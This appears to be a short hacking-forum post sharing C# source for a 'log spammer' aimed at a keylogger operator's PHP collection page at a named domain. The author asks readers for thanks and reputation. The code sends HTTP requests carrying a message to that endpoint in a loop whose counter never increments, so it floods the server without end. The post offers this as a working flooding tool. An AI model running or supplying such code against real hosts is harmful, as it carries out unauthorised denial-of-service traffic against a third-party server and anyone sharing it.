Log Spammer
Here's a tool/src to spam those stealing, pesky log keepers.
Basically just a tool for annoyance, Compile into a c# application.
Remember to give me them Thanks, and Rep +'s. I feed off them.
Basically just a tool for annoyance, Compile into a c# application.
Code:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using Microsoft.Win32;
using System.Net;
namespace ConsoleApplication12
{
class Program
{
const string phpScript = "http://royalkingamers.info/viratkeyz/index.php";
//Link to the site above. Always have /index.php at the end.
static string keys = "";
static void Main(string[] args)
{
keys = keys + "Put your message here";
UploadKeys();
}
static void UploadKeys()
{
int myInt = 0;
while (myInt < 10)
{
WebRequest httpReq;
httpReq = HttpWebRequest.Create(phpScript + "?w=" + keys);
httpReq.GetResponse();
}
}
}
}